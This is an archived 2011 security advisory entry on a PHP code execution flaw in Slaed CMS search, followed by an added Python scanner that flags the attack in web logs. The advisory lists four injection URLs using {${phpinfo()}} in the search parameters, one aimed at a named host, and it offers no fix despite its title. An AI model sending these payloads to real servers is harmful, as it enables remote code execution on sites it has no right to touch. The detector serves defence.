Slaed CMS code execution flaws and fixes

2011-09-14T00:00:00
ID MYHACK58:62201131835
Type myhack58
Reporter Anonymous
Modified 2011-09-14T00:00:00

Description

Title: Slaed CMS Code exec

Author: brain[pillow]

Download address: <http://slaed.net/>

Test platform: OpenSlaed 1.2 (free), Slaed CMS <= 4.*

On different versions of this software the following vulnerabilities are available:

www.badguest.cn/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view

/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view

OR:

/search.html?mod=&word={${phpinfo()}}&query=ok&to=view

/search.html?mod=&word=ok&query={${phpinfo()}}&to=view
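
A defender-side check for the request patterns listed above, as an added example that is not part of the original advisory: it scans web access log lines for PHP curly interpolation syntax in the word or query parameter of the search endpoints, including percent-encoded and double-encoded forms. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameter names taken from the request patterns listed in the advisory.
SEARCH_PARAMS = {"word", "query"}
# PHP curly interpolation openers: "{$" or "${".
INTERPOLATION = re.compile(r"\{\s*\$|\$\s*\{")
# Assumption: combined log format; only the request target is extracted.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Sep/2011:10:00:01 +0000] "GET /index.php?name=Search&mod=&word=ok&query=ok&to=view HTTP/1.1" 200 5120',
    '192.0.2.44 - - [14/Sep/2011:10:00:07 +0000] "GET /index.php?name=Search&mod=&word=%7B%24%7Bphpinfo()%7D%7D&query=ok&to=view HTTP/1.1" 200 48211',
    '192.0.2.44 - - [14/Sep/2011:10:00:09 +0000] "GET /search.html?mod=&word=ok&query=%257B%2524%257Bphpinfo()%257D%257D&to=view HTTP/1.1" 200 48190',
    '192.0.2.10 - - [14/Sep/2011:10:00:12 +0000] "GET /index.php?name=News&id=7 HTTP/1.1" 200 3011',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so %257B%2524 is still seen as {$."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return the search parameters of one request target that carry interpolation syntax."""
    parts = urlsplit(target)
    pairs = [(k.lower(), v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    path = parts.path.lower()
    is_search = path.endswith("/search.html") or (
        path.endswith("/index.php") and dict(pairs).get("name", "").lower() == "search")
    if not is_search:
        return []
    return sorted({k for k, v in pairs
                   if k in SEARCH_PARAMS and INTERPOLATION.search(fully_decode(v))})

def scan(lines):
    """Return (line number, flagged parameters) for every matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        flagged = suspicious_params(match.group(1)) if match else []
        if flagged:
            hits.append((number, flagged))
    return hits
```

Calling scan(SAMPLE_LOG) flags the second and third sample lines and leaves the ordinary search and the News request alone.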